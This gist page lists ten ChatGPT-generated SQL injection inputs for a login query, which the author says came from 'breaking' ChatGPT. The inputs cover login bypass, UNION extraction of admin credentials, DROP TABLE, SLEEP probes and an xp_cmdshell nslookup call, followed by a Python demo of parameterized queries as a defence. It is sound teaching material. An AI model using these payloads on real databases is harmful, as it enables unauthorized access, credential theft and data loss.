This is for the SQL SELECT statement. For INSERT statements, please see https://gist.github.com/shriyanss/1139f8c2b01e074642b7df745f9abc55
I simply broke ChatGPT to generate the following examples while I was trying to learn SQL Injections. The following output is completely generated by ChatGPT:
I understand your request for examples of inputs that can lead to SQL injection vulnerabilities. Below are ten examples along with the potential malicious inputs and the resulting SQL queries. Please note that these examples are for educational purposes, and it's crucial to apply proper input validation and use parameterized queries or prepared statements to prevent SQL injection.
Malicious Input:
' OR '1'='1'; --
Resultant Query:
SELECT * FROM Users WHERE Username = '' OR '1'='1'; --' AND Password = '';
Malicious Input:
' UNION SELECT null, 'Malicious Data', null; --
Resultant Query:
SELECT * FROM Users WHERE Username = '' UNION SELECT null, 'Malicious Data', null; --' AND Password = '';
Malicious Input:
'; DROP TABLE Users; --
Resultant Query:
SELECT * FROM Users WHERE Username = ''; DROP TABLE Users; --' AND Password = '';
Malicious Input:
' OR IF(1=1, SLEEP(5), 0); --
Resultant Query:
SELECT * FROM Users WHERE Username = '' OR IF(1=1, SLEEP(5), 0); --' AND Password = '';
Malicious Input:
' OR '1'='1' AND 'a'='a'; --
Resultant Query:
SELECT * FROM Users WHERE Username = '' OR '1'='1' AND 'a'='a'; --' AND Password = '';
Malicious Input:
'; EXEC xp_cmdshell('nslookup example.com'); --
Resultant Query:
SELECT * FROM Users WHERE Username = ''; EXEC xp_cmdshell('nslookup example.com'); --' AND Password = '';
Malicious Input:
' UNION SELECT username, password FROM admin_users; --
Resultant Query:
SELECT * FROM Users WHERE Username = '' UNION SELECT username, password FROM admin_users; --' AND Password = '';
Malicious Input:
' OR 1=1; --
Resultant Query:
SELECT * FROM Users WHERE Username = '' OR 1=1; --' AND Password = '';
Malicious Input:
' OR 1=1; --
Resultant Query:
SELECT * FROM Users WHERE Username = '' OR 1=1; --' AND Password = '';
Malicious Input:
'; IF(1=1, SLEEP(5), 0); --
Resultant Query:
SELECT * FROM Users WHERE Username = ''; IF(1=1, SLEEP(5), 0); --' AND Password = '';
Preventing SQL injection involves using parameterized queries or prepared statements and validating/sanitizing user inputs. Always follow security best practices to protect your application from potential vulnerabilities.
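The parameterized-query defence named above, shown next to the string-concatenation pattern that the listed queries imply. This is an added example, not part of the original gist or the ChatGPT output; it assumes Python's built-in sqlite3 module with a constructed in-memory Users table, and the function names are hypothetical.

```python
import sqlite3

# Constructed sample: three of the tautology inputs listed on this page.
PAGE_INPUTS = ["' OR '1'='1'; --", "' OR 1=1; --", "' OR '1'='1' AND 'a'='a'; --"]


def make_db():
    """In-memory database with a constructed Users table and one account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    db.execute("INSERT INTO Users VALUES (?, ?)", ("alice", "s3cret-hash"))
    return db


def login_concatenated(db, username, password):
    """Vulnerable pattern: input is spliced into the SQL text, so a quote
    in the input ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT * FROM Users WHERE Username = '" + username +
           "' AND Password = '" + password + "';")
    return db.execute(sql).fetchone()


def login_parameterized(db, username, password):
    """Hardened pattern: the SQL text is fixed and the input is bound as
    data, so quotes and comment markers are compared as literal characters."""
    sql = "SELECT * FROM Users WHERE Username = ? AND Password = ?"
    return db.execute(sql, (username, password)).fetchone()


def compare(inputs=PAGE_INPUTS):
    """For each input, report whether each login pattern returned a row."""
    db = make_db()
    results = []
    for payload in inputs:
        concatenated = login_concatenated(db, payload, "") is not None
        parameterized = login_parameterized(db, payload, "") is not None
        results.append((payload, concatenated, parameterized))
    return results


if __name__ == "__main__":
    for payload, concatenated, parameterized in compare():
        print(f"{payload!r:32} concatenated={concatenated} "
              f"parameterized={parameterized}")
```

With the concatenated query every listed input returns the stored row without a valid password; with bound parameters the same inputs match no row, while the real username and password still log in.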